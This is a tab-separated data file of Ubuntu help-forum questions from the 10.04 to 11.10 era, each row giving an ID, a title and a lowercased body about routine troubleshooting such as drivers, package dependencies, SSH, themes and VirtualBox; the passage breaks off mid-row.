101650	how can i get thunderbird contacts to sync with ubuntu one ?	in the setup instructions for ubuntu one with thunderbird it reads : click on the checkbox next to `` directory server '' and select `` ubuntu one '' from the pull down menu well , there is no directory server for u1 listed in my 11.10 install , what 's missing ? does thunderbird need re-installing ? or is it a u1 problem ?
101651	how to install themes with gnome tweak tool ?	i have been using the default ubuntu 11.10 with unity for some time now and decided to start customizing it . i have already been able to make some changes with the gnome-tweak-tool . however , there are many themes that i get from gnome-look.org that do n't appear in the gnome-tweak-tool even after putting them in the /usr/share/themes folder . any idea why this is happening ? thanks .
101652	can i remove/ uninstall `` toggle desktop '' ?	this is where i found out how to install it . i tried sudo apt-get remove wmctrl but it did not work , even after reboot . i could not find anything on the internet . it is the icon on the left , with the gears . maybe there is a way to remove any of these icon ( the toggle desktop ) ? ones in the top bar ? for the record i 'm using ubuntu 11.10
101657	nautilus will not open as root	i have reinstalled my ubuntu 11.10 per one accident a couple of days , when i try to open nautilus as root from console i get this error : nautilus [ 3282 ] : segfault at 0 ip 00007faa7d56bcea sp 00007faa76aaf928 error 4 in libc-2.13.so [ 7faa7d4eb000+195000 ] i un-installed all extensions of the nautilus and the same error still occurs but only as root my distro is ubuntu 11.10 64bits
101658	firefox update fails with `` not found '' error	i got 3 update notifications for firefox : yet when i click update , it fails with a `` not found '' error : any idea why this is ? how to fix this ?
101659	boot to a black screen but recovery mode boot works	i 'm running windows xp and ubuntu 11.10 as a dual boot , however , at the grub screen , the only way to boot ubuntu is to select recovery mode and then select resume normal boot . if i select the proper way to boot ubuntu however , the screen goes black and then after a while goes to a screen with some text that looks like a terminal screen . how do i make it so this does not happen ? edit* i justst installed it using the disk i had made back when i dual booted my other computer awhile back , and i just partioned my disks in the setup . when i 'm in the text mode i think it is fully functional because when i go ctrl + alt + f1 it gives me the option to login , but its all text based .
101666	ubuntu one not syncing and not providing feedback	firstly , i apologize for not being more specific with my problem , but ubuntu one is just not providing me with any information . it appears to be working , it states that `` syncronization in progress ... '' but it never actually syncronizes ( by never i mean 3 days ) . when i first selected a folder to sync using ubuntu one it took on the order of hours to sync over 500mb of files - it uploaded the folder hierarchy first and populated the folders over a few hours . that is not happening at all now . please let me know if there is a way i can get more information out of ubuntu one that i can post and hopefully resolve this issue . thanks , joe
101667	realtek semiconductor corp. rtl8188cus 802.11n wlan not connecting to mifi	i 'm using the above lm006 micro usb adapter with a compaq pc cq1020uk . i 'm attempting to connect with a huawei e5830 mifi . the mifi shows up on the connection panel , attempts to connect but never does . it keeps asking for the password over and over , never connecting each time after 10 seconds of trying . i know the password is correct , the mifi runs fine with my ubuntu 11.10 notebook . does anyone have any ideas ?
101670	how can i allow ssh password authentication from only certain ip addresses ?	i 'd like to allow ssh password authentication from only a certain subnet . i see the option to disallow it globally in /etc/ssh/sshd_config : # change to no to disable tunnelled clear text passwords # passwordauthentication yes is there a way to apply this configuration to a select range of ip addresses ?
101671	ubuntu 11.04 laptop screen not working	just installed ubuntu 11.04 and my laptop screen has stopped working , although an external monitor still works fine . it wo n't even display the bios . it stopped working during a debian upgrade ( yesterday ) , so i installed ubuntu hoping it would fix it . it is an asus with an ati chip , the only thing i have tried is installing the fglrx drivers , but they are causing a kernel panic , and i have as of yet been unable to get it to boot without quiet or splash . root @ fluffie : /home/chris # lspci -nn 00:00.0 host bridge [ 0600 ] : advanced micro devices [ amd ] rs780 host bridge [ 1022:9600 ] 00:01.0 pci bridge [ 0604 ] : advanced micro devices [ amd ] rs780/rs880 pci to pci bridge ( int gfx ) [ 1022:9602 ] 00:02.0 pci bridge [ 0604 ] : advanced micro devices [ amd ] rs780 pci to pci bridge ( ext gfx port 0 ) [ 1022:9603 ] 00:05.0 pci bridge [ 0604 ] : advanced micro devices [ amd ] rs780 pci to pci bridge ( pcie port 1 ) [ 1022:9605 ] 00:06.0 pci bridge [ 0604 ] : advanced micro devices [ amd ] rs780 pci to pci bridge ( pcie port 2 ) [ 1022:9606 ] 00:11.0 sata controller [ 0106 ] : ati technologies inc sb7x0/sb8x0/sb9x0 sata controller [ ahci mode ] [ 1002:4391 ] 00:12.0 usb controller [ 0c03 ] : ati technologies inc sb7x0/sb8x0/sb9x0 usb ohci0 controller [ 1002:4397 ] 00:12.1 usb controller [ 0c03 ] : ati technologies inc sb7x0 usb ohci1 controller [ 1002:4398 ] 00:12.2 usb controller [ 0c03 ] : ati technologies inc sb7x0/sb8x0/sb9x0 usb ehci controller [ 1002:4396 ] 00:13.0 usb controller [ 0c03 ] : ati technologies inc sb7x0/sb8x0/sb9x0 usb ohci0 controller [ 1002:4397 ] 00:13.1 usb controller [ 0c03 ] : ati technologies inc sb7x0 usb ohci1 controller [ 1002:4398 ] 00:13.2 usb controller [ 0c03 ] : ati technologies inc sb7x0/sb8x0/sb9x0 usb ehci controller [ 1002:4396 ] 00:14.0 smbus [ 0c05 ] : ati technologies inc sbx00 smbus controller [ 1002:4385 ] ( rev 3a ) 00:14.2 audio device [ 0403 ] : ati technologies inc sbx00 azalia ( intel hda ) [ 1002:4383 ] 00:14.3 isa bridge [ 0601 ] : ati technologies inc sb7x0/sb8x0/sb9x0 lpc host controller [ 1002:439d ] 00:14.4 pci bridge [ 0604 ] : ati technologies inc sbx00 pci to pci bridge [ 1002:4384 ] 00:14.5 usb controller [ 0c03 ] : ati technologies inc sb7x0/sb8x0/sb9x0 usb ohci2 controller [ 1002:4399 ] 00:18.0 host bridge [ 0600 ] : advanced micro devices [ amd ] family 11h processor hypertransport configuration [ 1022:1300 ] ( rev 40 ) 00:18.1 host bridge [ 0600 ] : advanced micro devices [ amd ] family 11h processor address map [ 1022:1301 ] 00:18.2 host bridge [ 0600 ] : advanced micro devices [ amd ] family 11h processor dram controller [ 1022:1302 ] 00:18.3 host bridge [ 0600 ] : advanced micro devices [ amd ] family 11h processor miscellaneous control [ 1022:1303 ] 00:18.4 host bridge [ 0600 ] : advanced micro devices [ amd ] family 11h processor link control [ 1022:1304 ] 01:05.0 vga compatible controller [ 0300 ] : ati technologies inc rs780m/rs780mn [ radeon hd 3200 graphics ] [ 1002:9612 ] 02:00.0 vga compatible controller [ 0300 ] : ati technologies inc m92 [ mobility radeon hd 4500 series ] [ 1002:9553 ] 02:00.1 audio device [ 0403 ] : ati technologies inc rv710/730 [ 1002 : aa38 ] 03:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 01 ) 04:00.0 network controller [ 0280 ] : atheros communications inc. ar9285 wireless network adapter ( pci-express ) [ 168c:002b ] ( rev 01 ) xorg.log and apparently xorg.conf does n't exist anymore . i apologize for not posting this earlier , i 've never had a main monitor issue like this so i was unsure what would be helpful .
101674	create .xml file with data from bash	i am trying to make a .xml file , the bash command need to copy this block of code , and replace the city-from-text-file-line-1 attribute from city.txt ( one city per line ) < ss : row ss : height = '' 22 '' > < ss : cell > < ss : data ss : type= '' string '' > xx < /ss : data > < /ss : cell > < ss : cell > < ss : data ss : type= '' string '' > city-from-text-file-line-1 < /ss : data > < /ss : cell > < ss : cell > < ss : data ss : type= '' string '' > california < /ss : data > < /ss : cell > < ss : cell > < ss : data ss : type= '' string '' > ca < /ss : data > < /ss : cell > < ss : cell > < ss : data ss : type= '' string '' > xx < /ss : data > < /ss : cell > < ss : cell > < ss : data ss : type= '' string '' > xx < /ss : data > < /ss : cell > < ss : cell > < ss : data ss : type= '' string '' > xx < /ss : data > < /ss : cell > < ss : cell > < ss : data ss : type= '' string '' > xx < /ss : data > < /ss : cell > < ss : cell > < ss : data ss : type= '' string '' > xx < /ss : data > < /ss : cell > < ss : cell > < ss : data ss : type= '' string '' > xx < /ss : data > < /ss : cell > < ss : cell > < ss : data ss : type= '' string '' > xx < /ss : data > < /ss : cell > < ss : cell > < ss : data ss : type= '' string '' > xx < /ss : data > < /ss : cell > < ss : cell > < ss : data ss : type= '' string '' > xx < /ss : data > < /ss : cell > < ss : cell > < ss : data ss : type= '' string '' > xx < /ss : data > < /ss : cell > < ss : cell > < ss : data ss : type= '' string '' > xx < /ss : data > < /ss : cell > < ss : cell > < ss : data ss : type= '' string '' > xx < /ss : data > < /ss : cell > < ss : cell > < ss : data ss : type= '' string '' > xx < /ss : data > < /ss : cell > < ss : cell > < ss : data ss : type= '' string '' > xx < /ss : data > < /ss : cell > < ss : cell > < ss : data ss : type= '' string '' > xx < /ss : data > < /ss : cell > < ss : cell > < ss : data ss : type= '' string '' > xx < /ss : data > < /ss : cell > < ss : cell > < ss : data ss : type= '' string '' > xx < /ss : data > < /ss : cell > < ss : cell > < ss : data ss : type= '' string '' > xx < /ss : data > < /ss : cell > < ss : cell > < ss : data ss : type= '' string '' > xx < /ss : data > < /ss : cell > < ss : cell > < ss : data ss : type= '' string '' > xx < /ss : data > < /ss : cell > < ss : cell > < ss : data ss : type= '' string '' > xx < /ss : data > < /ss : cell > < /ss : row >
101677	using phpldapadmin and configuring slapd	so , i 've run through this guide here : https : //help.ubuntu.com/11.04/serverguide/c/openldap-server.html to the point where i have pushed the backend and frontend directory . so now i have an admin account and password , as well as some ous . well i would like to use phpmyadmin to add more users and stuff but after i log in i get this message on the left : dc=nodomain this base entry does not exist.create it ? clicking `` create it ? '' doesnt do anything and i can not interact with my existing directory tree . i found a guide from 2009 on how to set it up slapd and use phpldapadmin but it 's either outdated or my existing setup is conflicting with it . what can i do ? can i completely purge my system of any and all ldap stuff ?
101680	skype shuts down when the other person tries sharing their screen	i have installed skype on my 11.10 and it keeps shutting down as soon as the other person switches of its video . while i have read that i need to delete the shared.xml file i cant seem to locate the directory . i have even searched for the file manually . i installed skype using the software center so i am a little confused as to why i cant find it . every time i go to the home folder it has no skype folder where this exists . i even tried removing it from the terminal using rm command as mentioned in the protected thread but it only says that no such directory exists . update : ok so i found shared.xml and to my surprise it was still in the same place as mentioned by others , /.skype/shared.xml so i used rm ~/.skype/shared.xml it just went to the next command line entry it did n't exactly return a value but skype would function even if the other person switched off their video . but when they try sharing their screen skype still switches off . can someone please help me to sort this issue ?
101681	i have installed python-doc . how can i access it ?	sorry if this is a such an obvious question , but where does ubuntu put documentation packages for python , node.js , redis , mysql , mongodb , and other applications ? and why i can not access it by typing python-doc in the terminal ?
101683	login problem after changing some settings	i have done some operations at the same time as follows : created a new general account . changed the password of super user to empty . set auto login for super user . after restarting my system , i am facing following problems : i am not able to login through my super user , it come back to same welcome screen . i am able to login with general user , but in that account i am not able to login through super user . how can i correct this ?
101688	how to get/edit exif meta-data of multiple images ?	i ran into big problem yesterday night . i took out my old digital camera , and started using it without setting current date and time . all photos clicked now have date as jan 01 , 2009 i want to change the date and time ( and other exif image meta-data ) of multiple images . please recommend some software which can process on multiple images in single click/go .
101696	how to clone an ubuntu server install ?	i have a vps with mediatemple and would like to clone the base-system os that they install , i have got a full packages list that is installed by default here : http : //wiki.mediatemple.net/w/ ( ve ) : ubuntu_default_package_list but i have no idea how i then translate this into the base ubuntu server install , upon first startup with mediatemple my server was using 9mb of ram ( yes 9 ! ) , with the `` minimal '' install provided from the ubuntu 10.04 lts dvd i was getting almost 4-500mb ! so i ran top on both , on mediatemple i saw this : 1 root 15 0 23320 1580 1272 s 0 0.2 0:01.04 init 1158 root 15 0 49268 2560 2012 s 0 0.3 0:00.04 sshd 1214 root 15 0 21084 1016 776 s 0 0.1 0:00.00 cron 1215 syslog 15 0 12456 800 608 s 0 0.1 0:00.05 syslogd 3572 myles 18 0 4100 652 544 s 0 0.1 0:00.00 sh and on my own vm install there were more than could be listed ... so the question is , how do i translate that packages list into a custom iso or configure the dvd in such a way that i have those and how do i get the server to start up with only those processes ?
101703	dependency errors after installing hedgewars	i was installing hedgewars game on my ubuntu and then something happened . i do n't remember . all i know is i ca n't remove or install anything . there is a red icon and when i click it it says broken count > 0 . when i open software center and click repair , this appears : installarchives ( ) failed : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 128308 files and directories currently installed . ) unpacking hedgewars-data ( from ... /hedgewars-data_0.9.17-1_all.deb ) ... dpkg-deb ( subprocess ) : data : internal gzip read error : ' < fd:4 > : invalid stored block lengths' dpkg-deb : error : subprocess < decompress > returned error exit status 2 dpkg : error processing /var/cache/apt/archives/hedgewars-data_0.9.17-1_all.deb ( -- unpack ) : short read on buffer copy for backend dpkg-deb during `./usr/share/games/hedgewars/data/forts/woodr.png' errors were encountered while processing : /var/cache/apt/archives/hedgewars-data_0.9.17-1_all.deb error in function : systemerror : e : sub-process /usr/bin/dpkg returned an error code ( 1 ) dpkg : dependency problems prevent configuration of hedgewars : hedgewars depends on hedgewars-data ( > = 0.9.17 ) ; however : package hedgewars-data is not installed . dpkg : error processing hedgewars ( -- configure ) : dependency problems - leaving unconfigured i am guessing there is something wrong with hedgewars game . and also i tried using terminal as they told me on the net it did not work . what to do ?
101706	fps in world of warcraft with wine	i 'm using bumblebee 3.0 ( also tried ironhide ) ( i have a dell xps 15 ) however my fps is 8 when flying above stormwind looking down at the ah . on windows this was 18 fps while having the graphics even higher and in d3d . is there anything what i could try to improve performance ? due to the fact i 'm using opengl many graphics features are not available which means basically that my fps should be a lot higher . i 'm using wine 1.4 rc1 . thanks in advance .
101713	banshee can not see an audio cd	if i insert an audio cd into my computer nothing happens . nothing at all . according to the banshee documentation , the cd should `` automatically appear within banshee in your sources list , beneath your music library and video library sources '' . it does n't . within banshee , edit > preferences > extensions > core > audio cd support is turned on .
101715	resizing virtual drive	i am running ubuntu as a guest on an imac with virtualbox version 4.1.8 . what is the easiest way to resize the virtual drive ? please provide as much detail as possible including the correct format for any commands .
101719	logitech k750 mac version keyboard - the keypad stopped working	last week after upgrades my keyboard stopped , but still works fine in windows . the 5 key though will bring up a context edit menu . anyone else have this since the last two sets of upgrades ? any solution or ideas ?
101724	does ubiquity respect my former partition layout with a new installation ?	if i have had two partition on my laptop ever since i use linux . one for root and another for home . what does ubiquity do if i ask it to replace previous installation of ubuntu with a new one ? will it install everything to / ( root ) or will it respect my partition scheme and take home partition as /home ?
101725	ubuntu not starting up following crash	this afternoon my headless ubuntu machine seemed to dissapear from the network . couldnt ping it , ssh sessions that were ongoing suddenly died . i rebooted the machine and ... nothing . a few seconds of drive activity and then the machine just sits there . i connected it up to a monitor , and i can see the bios come up , check for a bootable cd , and then seemingly try to boot from the hdd , but nothing happens . i suspect that i might be in the wrong place here , as it may well not be a ubuntu issue - i boot into a livecd , and mount the drive and look in /var/logs , and can see nothing at all since the last time i rebooted , several days ago . its as if the bios has 'lost ' the install . ive confirmed the partition is marked bootable , and reinstalled/reconfigured grub , but nothing . any ideas/suggestions ?
101726	how can i trick my system into thinking i have installed a program ( gdc )	g-wan uses gdc to compile d scripts . i 'm having problems with gdc for d2 and would like to use dmd instead ( they 're both d compilers ) . so what i 've done is used alias gdc= '' dmd '' i can now compile d2 code by calling gdc hello.d but g-wan still tells me to use d ( *.d ) scripts , install 'gdc' can i trick it into using dmd without having access to the source code ?
101729	how to highlight active workspace switcher 's workspace name ?	i am using gnome classic in 11.10 and when i select a particular workspace it does not highlight it , so i do not know on which workspace i am unless i remember which one i clicked . i have no problems operating the switcher , it is just the highlighting issue purely for cosmetics and ease of use . how can i get the highlight active workspace switcher 's workspace name ?
101734	how can i show the application name in the panel ?	i 'm using gnome fallback mode with indicator applets in the panel , since they 've recently been ported to gnome 3 . i installed the indicator-appmenu package and i 'm using it on the gnome panel . however , it does n't show the application name like it does in unity . how can i make it show the name of the application ? here 's a screenshot . i 'd like it to say the application name between the main menu and the appmenu .
101735	how is installing from a repository different from installing via downloading a .deb file ?	i am new to ubuntu . how is installing software from a repository different from downloading the .deb file from a website and installing through the package manager ?
101744	trouble installing package from a ppa	on ubuntu 11.10 32-bit , i am trying to install a package update to fix the bug detailed here . in comment # 25 robert hooker provides a link for his package . i have followed the instructions on the page for adding it to my repositories ( both manually and from the terminal ) , and when i run sudo apt-get update i get this message at the end : w : failed to fetch ppa.launchpad.net/sarvatt/sru3/ubuntu/dists/oneiric/main/source/sources 404 not found w : failed to fetch ppa.launchpad.net/sarvatt/sru3/ubuntu/dists/oneiric/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . how can i get and install these packages ?
101745	is using a virtualbox safer than using wine ?	i 'm having to get a copy of windows xp from the nether regions of the net and want to run it through a virtualbox . would that be safer as to a wine installation ? safer as in `` not possible to get any infections ? '' any help is appreciated . ( the only reason i 'm getting a copy off the net is because i ca n't find my old copy of the xp disc - that 's why i 'm going this route )
101746	how can i execute a .jar file from the terminal	i know that to execute a file , i use the . command , then the file name with a space between them . but i 'm trying to execute a .jar file using the . and it does not work . i went into the properties and marked it as executable and made it run with java . is there a way to execute a file with java in the bash terminal ? i am trying to execute the minecraft.jar file .
101748	how can i increase resolution when impossible to set up nvidia driver ?	i was stuck at 1024x758 before creating an /etc/x11/xorg.conf file as follows which works well to allow me to have a resolution of 1920x1200 with the vesa driver . section `` device '' identifier `` configured video device '' driver `` vesa '' endsection section `` monitor '' identifier `` configured monitor '' horizsync 24.0 - 83.0 vertrefresh 50.0 - 75.0 endsection section `` screen '' identifier `` default screen '' monitor `` configured monitor '' device `` configured video device '' subsection `` display '' viewport 0 0 depth 24 modes `` 1920x1200 '' endsubsection endsection but now my display is kind of slow . i have an nvidia geforce 8600gt but really can not find how to set up the driver to work . are there any alternatives to vesa that would work faster ?
101756	how do i print a batch of word files in a directory ?	i am trying to print out 40 or so different .doc files which are in a directory . there is no right-click option to print them all out if i select them . i do n't want to open each one and then print them one by one . is there any way to batch print word ( .doc ) files in ubuntu ?
101759	how do i connect using ssh over a direct ethernet connection ?	i have a laptop , a desktop , and a spare 5 ' ethernet cable that i can use to directly connect one to the other . the desktop freezes every few days or so , seemingly at random , and when it happens i want to be able to ssh into it as mentioned here so i can make a proper bug report and get this fixed . unfortunately , the linked guide does n't give any instructions on how to do this . can someone provide a step-by-step answer on how to ssh from my laptop into my desktop when the latter freezes , and also how to conveniently retrieve the necessary files once logged in to attach to the bug report ? a couple things to keep in mind : i 'm using standard desktop ubuntu installs on both systems . if there 's any extra packages i need installed beforehand , let me know . my machines each have only a single ethernet port ; the desktop uses this for its wired-only internet connection , and my laptop on the other hand uses an 802.11n wifi connection . only one machine can use the wired connection at a time due to network restrictions in my dorm , and the wireless connection my laptop uses is very unreliable . thus , answers should preferably not depend on a working internet connection , but rather a direct connection between the two machines , if that 's possible . i 've never logged into one of my own machines from another of my own before , so assume i know nothing and be sure to provide plenty of details . : )
101763	how to upload theme files into a ppa ?	i have a gtk3 and a gnome shell theme . i have n't created a deb file yet ... can i please know how to create a deb file and upload it to the launchpad ? is there any good guides ?
101764	command line calc program and pi constant	i am using calc often ( from the terminal ) and i was wondering if there is a pi constant in there , predefined , somewhere ?
101768	how to upgrade mysql to > =5.1.51 on lucid via aptitude	the mysql-server package in lucid is listed as 5.1.41-3ubuntu12.7 . is there a safe way to upgrade to the latest 5.1 release via aptitude ?
101770	kdenlive not working in ubuntu 11.10	i am using kubuntu 11.10 ( 32-bit ) . i tried to install kdenlive in it . for installing kdenlive , i added the third party repository to get the latest version of the software . after installing its giving an error to upgrade mlt module to version 0.7 . please tell me how to upgrade mlt module . is there any other video editing program that lets me cut a part of the video .
101777	change the window title text color to match the theme	i 'm using gnome-shell . i 've tried gnome-color-chooser and gnome tweak , but gnome-color-chooser does not work on gtk3 and , as far as i know , nor does it work on gtk2 ; the option is n't in gnome tweak . i have tried using dconf-editor , but i 'm not sure what i 'm doing . i 've tried editing these files but i am not exactly sure what i should be changing . /usr/share/themes/ambiance-blue/gtk-3.0/gtk.css /usr/share/themes/ambiance-blue/gtk-3.0/settings.ini /usr/share/themes/ambiance-blue/gtk-2.0/gtkrc i am trying to make my firefox nightly window and the other windows to have the same blue color ( they are currently white ) as the date/time and the weather extensions . i am using the ice cream sandwich shell theme .
101780	media player recognizing artists as a semi-colon separated list	i am a new user to ubuntu who has migrated from windows . though i had tried the previous versions of ubuntu ( and other linux distros ) but it never lasted solely because i 'm addicted to a music player , mediamonkey , which is available for windows but not for linux . it has a plethora of features , one of which is that it recognizes semi-colon ( ; ) delimited artist names as separate artists which makes the overall music experience better . i tried banshee , rythmbox and amrok but none of them seem to have this feature . they all take that text as a single artist which does n't help . is there any music player for linux that has this feature ?
101786	problem authenticating some packages	i ran sudo apt-get update and got the following error : reading package lists ... done w : gpg error : http : //ppa.launchpad.net oneiric release : the following signatures were invalid : badsig 0f678a01569113ae launchpad caffeine w : gpg error : http : //ppa.launchpad.net oneiric release : the following signatures could n't be verified because the public key is not available : no_pubkey 3b22ab97af1cdfa9 any ideas how to solve this ?
101788	how can i fix this error to update ubuntu 10.04 lts	error type : error value : installarchives ( ) failed file : /usr/share/packagekit/helpers/apt/aptbackend.py , line 2216 , in main ( ) file : /usr/share/packagekit/helpers/apt/aptbackend.py , line 2213 , in main run ( args , options.single ) file : /usr/share/packagekit/helpers/apt/aptbackend.py , line 2175 , in run backend.dispatcher ( args ) file : /usr/lib/python2.6/dist-packages/packagekit/backend.py , line 710 , in dispatcher self.dispatch_command ( args [ 0 ] , args [ 1 : ] ) file : /usr/lib/python2.6/dist-packages/packagekit/backend.py , line 657 , in dispatch_command self.update_packages ( only_trusted , package_ids ) file : /usr/share/packagekit/helpers/apt/aptbackend.py , line 202 , in _locked_cache func ( *args , **kwargs ) file : /usr/share/packagekit/helpers/apt/aptbackend.py , line 1230 , in update_packages self._commit_changes ( ) file : /usr/share/packagekit/helpers/apt/aptbackend.py , line 1842 , in _commit_changes packagekitinstallprogress ( self , install_range ) ) file : /usr/lib/python2.6/dist-packages/apt/deprecation.py , line 103 , in deprecated_function return func ( *args , **kwds ) file : /usr/lib/python2.6/dist-packages/apt/cache.py , line 381 , in commit raise systemerror ( `` installarchives ( ) failed '' ) how can i fix this error to update ubuntu 10.04 lts ?
101789	how to create screen session on startup with command that does n't end when command finishes	i want to edit my rc.local file to start up a few server sessions each in it 's own gnu screen . however , whenever i stop a server , the screen terminates . currently i have : screen -dms test ~/tmp/runserver.sh with this inside runserver.sh : node ~/dev/mouser/app.js how do i get the screen to stay alive after the passed in command or script terminates ?
101790	disable or change gnome drum beat sound	referencing a previous question : i would have expected system ▸ administration ▸ login screen ▸ play login sound to control this , but unchecking it does not prevent the drum beat sound from playing . so , that question is still open , none of those answers actually work . it seems that , possibly , firefox uses the same sound for javascript errors . there 's also : thufir @ tleilax : ~ $ thufir @ tleilax : ~ $ nl /usr/share/gnome/autostart/libcanberra-login-sound.desktop 1 [ desktop entry ] 2 type=application 3 name=gnome login sound 4 comment=plays a sound whenever you log in 5 exec=/usr/bin/canberra-gtk-play -- id= '' desktop-login '' -- description= '' gnome login '' 6 onlyshowin=gnome ; 7 autostartcondition=gnome /desktop/gnome/sound/event_sounds 8 x-gnome-autostart-phase=application 9 x-gnome-provides=login-sound thufir @ tleilax : ~ $ thufir @ tleilax : ~ $ nl /usr/share/gnome/shutdown/libcanberra-logout-sound.sh 1 # ! /bin/sh 2 # /usr/bin/canberra-gtk-play -- id= '' desktop-logout '' -- description= '' gnome logout '' thufir @ tleilax : ~ $ thufir @ tleilax : ~ $ now , i have n't rebooted , but even if that works , it wo n't fix the annoyance of the sound firefox plays for some dialogs . where is this drum beat sound file ?
101799	what git repository do the mainline kernel ppa builds come from , and are any changes made ?	i am debugging a curious issue with the kernel not supporting my laptop completely . ( this is my bug report ) i have installed the mainline builds from the mainline kernel ppa ( http : //kernel.ubuntu.com/~kernel-ppa/mainline/ ) , and discovered that the last working kernel version is v3.2.1 . anything after it , i.e . v3.2.2 , breaks . so i was going to use the git bisect tool to identity the specific commit between v3.2.1 and v3.2.2 which breaks on my laptop . i followed the instructions but the git repo they link to does n't have the tags for v3.2.x , so i found another one which sounds official and has the right tags : http : //git.kernel.org/ ? p=linux/kernel/git/stable/linux-stable.git ; a=summary , but after building v3.2.1 i still had the issue . so , what git repo do the mainline kernels come from ? also , are any patches/changes applied to them after being retrieved from the repository which would n't be in my build ?
101801	set up eth0 network interface using dhcp in initramfs	i created my own initramfs script ( based on live-initramfs ) and i need set up network connection ( using dhcp ) to get remote file . so what do i need to add to initramfs hook file ( ifconfig , dhclient ? ) . and how to write my initramfs script ? now i am trying something like this : mkdir -p /var/run/network # needed by ifup modprobe af_packet # for dhcp ? udevadm trigger udevadm settle ifup eth0 # ? ? ? for ifup i need /etc/network/interfaces file to have : auto eth0 iface eth0 inet dhcp but generally i do n't know what exactly need to be done for network device to work properly in initramfs . any idea or help ?
101802	packages having unmet dependencies : broken packages	when i try to install postgresql i get the following error : sudo apt-get install postgresql-client some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libc6-dev : breaks : gcc-4.4 ( < 4.4.6-4 ) but 4.4.4-14 ubuntu5 is to be installed e : broken packages how do i resolve this issue to install postgresql ?
101806	mouse scroll and additional buttons	i 've just installed ubuntu 11.10 on my laptop after using it a while in a virtual machine , and i got this annoying problem > mouse scroll toooooo fast ( vertical ) and toooooo slow ( horizontal ) . i 'm using a microsoft wireless mouse 5000 . is there a way to configure scroll and the 2 side buttons of my mouse ( the default actions for them are back and forward ) ?
101808	how can i disable screen locking _completely_ in ubuntu 10.04 ?	we have ubuntu-clients in our school and our students must not lock their screen . if they leave , they have to log out . unfortunately there is an option to lock screen , so many students do so . i managed to disable the automatic screen-lock , but i like to disable this completely . how can i manage this ? thank you in advance , jesko
101809	package 'vim ' has no installation candidate	i installed ubuntu inside windows 7 using vmware . i wanted to execute a c program in ubuntu . when i tried i got like this , b @ ubuntu : ~/examples $ vim a.c the program 'vim ' can be found in the following packages : * vim * vim-gnome * vim-tiny * vim-gtk * vim-nox try : sudo apt-get install < selected-package > b @ ubuntu : ~/examples $ sudo apt-get install vim [ sudo ] password for b : reading package lists ... done building dependency tree reading state information ... done package vim is not available , but is referred to by another package . this may mean that the package is missing , has been obseleted , or is only available from another source e : package 'vim ' has no installation candidate i tried apt-get install vim e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? when i tried to do su it asked me for a password . when i typed the root password its not accepting it and says `` authentication failure '' i could not install the vim package . is there any way i can install it ? please suggest me . how do i regain my root paswword .
101811	wallpaper always tiled on one screen with dual monitors	it seems like there is a bug in gnome-shell . it 's just impossible for me to add a wallpaper that will be spanned on boths screens . it 's either spanned on the first and tiled on the second screen or vice versa . it also gets even more tiled when i click on the activities button ... maybe this is related to the different resolutions : laptop screen : 1440x900 , external monitor : 2048x1152 . how can i fix this ?
101816	no graphic drivers on my ubuntu	im planning to switch to ubuntu , but i can not find graphic drivers when i ran ubuntu on a live cd.im using asus k53sc notebook.where and how should i find graphic drivers.please help.thank you . these are my graphic drivers : in ubuntu , it shows graphics unknown .
101817	gnome session does n't look right ... and shell extensions is empty ?	i wanted to change the theme of my desktop , so i downloaded a few themes that i wanted to try and followed this tutorial . after following the tutorial , shell extensions is still empty and the themes that i placed inside the .themes folder does not show up on the list . more over , when logging into the gnome session , this is what i see : http : //i.imgur.com/kvchx.png i do n't think it 's supposed to look like that . the panels at the top looks crappy . what do i do ? : ( i 'm using ubuntu 11.10 , on a lenovo laptop with intel core i5 and nvidia geforce ( w/ cuda ) .
101818	move system to virtualbox	i have hdd with windows 7 on one of the partintions which was installed previously on the same machine , connected to the laptop via the usb . previously the system was booted from this hdd using grub ( installed as a secondary system along with ubuntu on other partition ) . how can i move this partition to the virtualbox ? i 've created an iso image of this system , but i do n't have enough space on the new disk to fit both the image and new virtual disk . what if the usb drives are not supported in virtualbox ? edit : currently i 'm trying to create .vmi file directly from the partition ( not the iso ) . but probably i 'll encounter somple problems during booting , caused by the grub installed on the other partition .
101822	`` package dependencies can not be resolved '' error when installing software	iam getting a problem while install media player packages . package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . depends : libc6 ( > = 2.7 ) but 2.13-0ubuntu13 is to be installed depends : libglib2.0-0 ( > = 2.24.0 ) but 2.28.6-0ubuntu1 is to be installed depends : libgstreamer-plugins-base0.10-0 ( > = 0.10.22 ) but 0.10.32-1ubuntu5 is to be installed depends : libgstreamer0.10-0 ( > = 0.10.26 ) but 0.10.32-3ubuntu3 is to be installed depends : liborc-0.4-0 ( > = 1:0.4.10 ) but 1:0.4.11-2 is to be installed depends : libpostproc-extra-51 ( > = 4:0.6-1~ ) but 4:0.6.4-1ubuntu1+medibuntu1 is to be installed depends : libswscale-extra-0 ( > = 4:0.6-1~ ) but 4:0.6.4-1ubuntu1+medibuntu1 is to be installed gstreamer0.10-plugins-bad : depends : libc6 ( > = 2.7 ) but 2.13-0ubuntu13 is to be installed depends : libcairo2 ( > = 1.2.4 ) but 1.10.2-2ubuntu2 is to be installed depends : libcdaudio1 ( > = 0.99.12p2 ) but 0.99.12p2-9 is to be installed depends : libdc1394-22 but it is not going to be installed depends : libdirectfb-1.2-9 but it is not going to be installed depends : libflite1 but it is not going to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.5.2-8ubuntu4 is to be installed depends : libglib2.0-0 ( > = 2.26.0 ) but 2.28.6-0ubuntu1 is to be installed depends : libgsm1 ( > = 1.0.13 ) but it is not going to be installed depends : 